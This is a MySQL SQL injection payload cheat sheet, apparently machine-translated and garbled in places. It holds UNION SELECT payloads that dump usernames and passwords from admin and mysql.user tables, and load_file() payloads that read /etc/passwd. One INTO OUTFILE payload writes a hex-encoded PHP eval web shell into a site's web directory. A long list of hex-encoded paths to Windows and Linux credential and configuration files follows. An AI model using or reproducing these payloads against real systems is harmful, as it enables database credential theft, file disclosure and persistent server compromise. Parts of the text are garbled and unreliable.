MySQL SQL injection code
#%23--*/*/**/notes
union+select+ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,4 4,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84 , 85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100--
And+ (Select+count (*) +from+mysql.user) >0--determine if MySQL table can be read
Concat_ws (CHAR (32,58,32), User (), database (), version ()) Username MySQL version
Union+select+1,2,3,concat_ws (CHAR (32,58,32), User (), database (), version ()), 5,6,7,8,9,10,7--
UNION ALL Select 1,concat (user,0x3a,pass,0x3a,email) from users/* gets the user name password for the Users table email message
Unhex (Hex (@ @version)) Unhex mode view version
UNION ALL Select 1,unhex (Hex (@ @version)), 3/*
Convert (@ @version using latin1) Latin mode view version
Union+all+select+1,convert (@ @version using latin1), 3--
CONVERT (User () USING UTF8)
Union+all+select+1,convert (User () USING UTF8), 3--Latin method View username
and+1=2+union+select+1,passw,3+from+admin+from+mysql.user--getting MySQL account information
Union+all+select+1,concat (User,0x3a,password), 3+from+mysql.user--get MySQL account information
Union+select+1,concat_ws (0x3a,username,password), 3+from+admin--read ADMIN table username password data 0x3a to ":" Colon
Union+all+select+1,concat (Username,0x3a,password), 3+from+admin--
Union+all+select+1,concat (Username,char, password), 3+from admin--
Union+select+1,2,3,4,load_file (0x2f6574632f706173737764), 6--read the file through the Load_file () function
Union+select+1,2,3,4,replace (Load_file (0x2f6574632f706173737764), 0x3c,0x20), 6--full display of data through the Replace function
Union+select+1,2,3,char (0x3c3f706870206576616c28245f504f53545b39305d3f3b3e), 5,6,7,8,9,10,7+into+outfile+ ' D:\ web\90team.php '--write a sentence on the web directory Trojan
<?php+eval ($_post[90]?; > A sentence prototype for the above 16 encoding
Union+select+1,2,3,load_file (d:\web\logo123.jpg), 5,6,7,8,9,10,7+into+outfile+ ' d:\web\90team.php '-- Convert PHP horse to image type upload website and write to web directory via into outfile
Common query functions
1:system_user () system user name
2:user () User name
3:current_user Current user Name
4:session_user () User name of the account connected to the database
5:database () database name
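6:version () MySQL database version (same value as @@version)
7:load_file () MySQL function that reads a local file on the database server; it only works when the querying account holds the FILE privilege and the path is permitted by the secure_file_priv setting (the same two controls gate INTO OUTFILE), so withholding FILE from application accounts blocks it
8:@@datadir Database data directory path
9:@@basedir MySQL installation path
10:@@version_compile_os Operating system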
Under Windows:
C:/boot.ini//View system version 0x633a2f626f6f742e696e690d0a
C:/windows/php.ini//php configuration Information 0x633a2f77696e646f77732f7068702e696e69
C:/windows/my.ini//mysql configuration file, log the administrator login MySQL username and password 0x633a2f77696e646f77732f6d792e696e69
C:/winnt/php.ini 0x633a2f77696e6e742f7068702e696e69
C:/winnt/my.ini 0x633a2f77696e6e742f6d792e696e69
C:\mysql\data\mysql\user. MYD//stores the database connection password in the Mysql.user table 0x633a5c6d7973716c5c646174615c6d7973716c5c757365722e4d5944
C:\Program Files\rhinosoft.com\serv-u\servudaemon.ini//Store Virtual host Web site path and password
0x633a5c50726f6772616d2046696c65735c5268696e6f536f66742e636f6d5c536572762d555c53657276554461656d6f6e2e696e69
C:\Program Files\serv-u\servudaemon.ini 0x633a5c50726f6772616d2046696c65735c536572762d555c53657276554461656d6f6e2e696e69
C:\windows\system32\inetsrv\MetaBase.xml//iis configuration file
C:\windows\repair\sam//Store password for initial installation of Windows system
C:\Program files\ serv-u\servuadmin.exe//in Serv-U versions before 6.0 the administrator password is stored in this file
C:\Program Files\rhinosoft.com\servudaemon.exe
C:\Documents and Settings\All Users\Application Data\symantec\pcanywhere\*.cif File
Stored the login password for pcanywhere
C:\Program files\apache group\apache\conf \httpd.conf or C:\apache\conf \httpd.conf//View Windows system Apache file
0x633a5c50726f6772616d2046696c65735c4170616368652047726f75705c4170616368655c636f6e66205c68747470642e636f6e66
c:/resin-3.0.14/conf/resin.conf//view JSP developed Web site Resin file configuration information. 0x633a2f526573696e2d332e302e31342f636f6e662f726573696e2e636f6e66
C:/resin/conf/resin.conf 0x633a2f526573696e2f636f6e662f726573696e2e636f6e66
/usr/local/resin/conf/resin.conf viewing a JSP virtual host for Linux system configuration 0x2f7573722f6c6f63616c2f726573696e2f636f6e662f726573696e2e636f6e66
D:\APACHE\Apache2\conf\httpd.conf 0x643a5c4150414348455c417061636865325c636f6e665c68747470642e636f6e66
C:\Program Files\mysql\my.ini 0x433a5c50726f6772616d2046696c65735c6d7973716c5c6d792e696e69
C:\windows\system32\inetsrv\MetaBase.xml Viewing the virtual host configuration for IIS 0x633a5c77696e646f77735c73797374656d33325c696e65747372765c4d657461426173652e786d6c
C:\mysql\data\mysql\user. MYD A user password exists in the MySQL system 0x433a5c6d7973716c5c646174615c6d7973716c5c757365722e4d5944
Under Linux/Unix:
/etc/passwd 0x2f6574632f706173737764
/usr/local/app/apache2/conf/httpd.conf//apache2 Default configuration file 0x2f7573722f6c6f63616c2f6170702f617061636865322f636f6e662f68747470642e636f6e66
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf//virtual Site Settings 0x2f7573722f6c6f63616c2f6170702f617061636865322f636f6e662f65787472612f68747470642d76686f7374732e636f6e66
/usr/local/app/php5/lib/php.ini//php Related Settings 0x2f7573722f6c6f63616c2f6170702f706870352f6c69622f7068702e696e69
/etc/sysconfig/iptables//Get firewall rule policy from 0x2f6574632f737973636f6e6669672f69707461626c657320
/ETC/HTTPD/CONF/HTTPD.CONF//Apache configuration file 0x2f6574632f68747470642f636f6e662f68747470642e636f6e66
/etc/rsyncd.conf//Synchronizer configuration file 0x2f6574632f7273796e63642e636f6e66
/etc/my.cnf//MySQL configuration file 0x2f6574632f6d792e636e66
/etc/redhat-release//System version 0x2f6574632f7265646861742d72656c65617365
/etc/issue 0x2f6574632f6973737565
/etc/issue.net 0x2f6574632f69737375652e6e6574
/usr/local/app/php5/lib/php.ini//php Related Settings 0x2f7573722f6c6f63616c2f6170702f706870352f6c69622f7068702e696e69
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf//virtual Site Settings 0x2f7573722f6c6f63616c2f6170702f617061636865322f636f6e662f65787472612f68747470642d76686f7374732e636f6e66
/etc/httpd/conf/httpd.conf or/usr/local/apche/conf/httpd.conf view Linux Apache virtual Host configuration file 0x2f6574632f68747470642f636f6e662f68747470642e636f6e66
0x2f7573722f6c6f63616c2f61706368652f636f6e662f68747470642e636f6e66
/USR/LOCAL/RESIN-3.0.22/CONF/RESIN.CONF resin configuration file for 3.0.22 view 0x2f7573722f6c6f63616c2f726573696e2d332e302e32322f636f6e662f726573696e2e636f6e66
/usr/local/resin-pro-3.0.22/conf/resin.conf Ibid. 0x2f7573722f6c6f63616c2f726573696e2d70726f2d332e302e32322f636f6e662f726573696e2e636f6e66
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf view Apache virtual host configuration
0x2f7573722f6c6f63616c2f6170702f617061636865322f636f6e662f65787472612f68747470642d76686f7374732e636f6e66
/etc/sysconfig/iptables View Firewall Policy 0x2f6574632f737973636f6e6669672f69707461626c6573
Load_file (char (47)) lists the Freebsd,sunos system root directory
Replace (Load_file (0x2f6574632f706173737764), 0x3c,0x20)
Replace (Load_file (char (47,101,116,99,47,112,97,115,115,119,100)), char (All), char (32))
The two expressions above display the full source of a PHP file. If characters such as "<" are not replaced with a space, the browser treats the returned content as markup, and the code is not visible in the rendered page.
Common MySQL injection statements